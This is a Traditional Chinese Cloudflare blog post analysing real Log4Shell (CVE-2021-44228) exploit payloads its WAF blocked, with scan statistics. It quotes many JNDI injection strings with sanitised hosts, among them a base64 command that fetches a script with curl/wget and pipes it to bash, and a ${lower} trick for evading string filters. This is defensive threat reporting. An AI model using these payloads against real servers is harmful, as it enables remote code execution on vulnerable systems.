訂閱以接收新文章的通知:

外部擷取到的實際 CVE-2021-44228 負載

2021-12-10

閱讀時間:2 分鐘
本貼文還提供以下語言版本:EnglishFrançaisDeutsch日本語한국어简体中文

不久前曾寫到有關如何緩解 Log4j 中的 CVE-2021-44228、漏洞的緣由以及 Cloudflare 為客戶提供的緩解措施。正如我所寫到的,由於漏洞的嚴重性,我們正推出針對我們「免費」客戶的保護。

我們現在有很多小時的掃描和嘗試入侵的相關資料,我們可以開始探討外部和統計資料中正使用的實際負載。我們從 Cloudflare 透過 WAF 封鎖的請求開始。

今天早上(本文採用 UTC 時間)我們看到封鎖的攻擊中的慢速入口,最大峰值大約 1800(約每分鐘 20,000 個封鎖的惡意探索請求)。但掃描已持續了一整天。我們期待掃描繼續。

我們也查看了 WAF 封鎖的 IP 位址數目。在任何給定時間,主動掃描的 IP 數都在 200 到 400 之間。

到目前為止,最多的掃描或嘗試入侵次數來自加拿大,其次是美國。

很多遭到封鎖的請求都是以偵察的形式查看伺服器是否真的有漏洞。封鎖次數最高的惡意探索字串如下(我全程使用處理過的網域名稱和 IP 位址):

${jndi:ldap://x.x.x.x/#Touch}

看起來像是在攻擊位於 x.x.x.x 處伺服器的簡易方式,毫無疑問,執行者會控制此攻擊並記錄網際網路財產可入侵。這不會告知執行者更多資訊。第二熱門的請求包含以下內容:

Mozilla/5.0 ${jndi:ldap://x.x.x.x:5555/ExploitD}/ua

這出現在請求的 User-Agent 欄位中。請注意在 URI 的末尾寫著 /ua。顯然,這表明該執行者試圖在 User-Agent 中利用漏洞。

另一個令人關注的負載顯示,執行者所用的格式十分詳細(在此情況中是到連接埠 443 的未加密請求,而且他們正嘗試使用 http://):

${jndi:http://x.x.x.x/callback/https-port-443-and-http-callback-scheme}

有人試著假裝是 Googlebot 並納入一些額外的資訊。

Googlebot/2.1 (+http://www.google.com/bot.html)${jndi:ldap://x.x.x.x:80/Log4jRCE}

在下面的情況中,執行者正攻擊公用 Cloudflare IP,然後將該 IP 位址編碼到惡意探索負載中。那樣他們可以掃描多個 IP,並找出哪一個更容易進行攻擊。

${jndi:ldap://enq0u7nftpr.m.example.com:80/cf-198-41-223-33.cloudflare.com.gu}

該配置的變體是在惡意探索負載中包含受攻擊網站的名稱。

${jndi:ldap://www.blogs.example.com.gu.c1me2000ssggnaro4eyyb.example.com/www.blogs.example.com}

有些執行者不使用 LDAP,而使用 DNS。但 LDAP 是到目前為止最常用的通訊協定。

${jndi:dns://aeutbj.example.com/ext}

一次非常有趣的掃描涉及到使用 Java 和標準 Linux 命令列工具。負載看起來像這樣:

${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN1cmwgLXMgeC54LngueDo1ODc0L3kueS55Lnk6NDQzfHx3Z2V0IC1xIC1PLSB4LngueC54OjU4NzQveS55LnkueTo0NDMpfGJhc2g=}

base64 編碼的部份解碼為 curl 和透過管道進入 bash 的 wget。

(curl -s x.x.x.x:5874/y.y.y.y:443||wget -q -O- x.x.x.x:5874/y.y.y.y:443)|bash

請注意,不需要來自 curl/wget 的輸出,因此這只是攻擊伺服器,向執行者表示惡意探索起作用。

最後,我們看到一些執行者使用 Log4j 的其他功能,主動嘗試閃避過度簡單的字串封鎖,例如 ${jndi:ldap。舉例來說,常見的閃避技術使用如下所示的 ${lower} 功能(小寫字元):

${jndi:${lower:l}${lower:d}a${lower:p}://example.com/x

此時似乎有很多偵察正在進行。不論是好的還是壞的執行者都在掃描全世界易受攻擊的伺服器。最後,其中的一些偵察將轉為對伺服器和公司的實際入侵。而且,由於記錄已如此深入的嵌入前端和後端系統中,其中一些記錄可能在幾小時或幾天之內都不易發覺。

就像孢子在地下默默生長一樣,有些會穿透土壤進入地上。

由於入侵嘗試的演變,Cloudflare 的安全團隊正持續工作,並將視需要更新 WAF 和防火牆規則。

我們保護整個企業網路,協助客戶有效地建置網際網路規模的應用程式,加速任何網站或網際網路應用程式抵禦 DDoS 攻擊,阻止駭客入侵,並且可以協助您實現 Zero Trust

從任何裝置造訪 1.1.1.1,即可開始使用我們的免費應用程式,讓您的網際網路更快速、更安全。

若要進一步瞭解我們協助打造更好的網際網路的使命,請從這裡開始。如果您正在尋找新的職業方向,請查看我們的職缺
Vulnerabilities安全性Page RulesLog4JLog4Shell

在 X 上進行關注

Cloudflare|@cloudflare

相關貼文

2024年10月08日 下午1:00

Cloudflare acquires Kivera to add simple, preventive cloud security to Cloudflare One

The acquisition and integration of Kivera broadens the scope of Cloudflare’s SASE platform beyond just apps, incorporating increased cloud security through proactive configuration management of cloud services. ...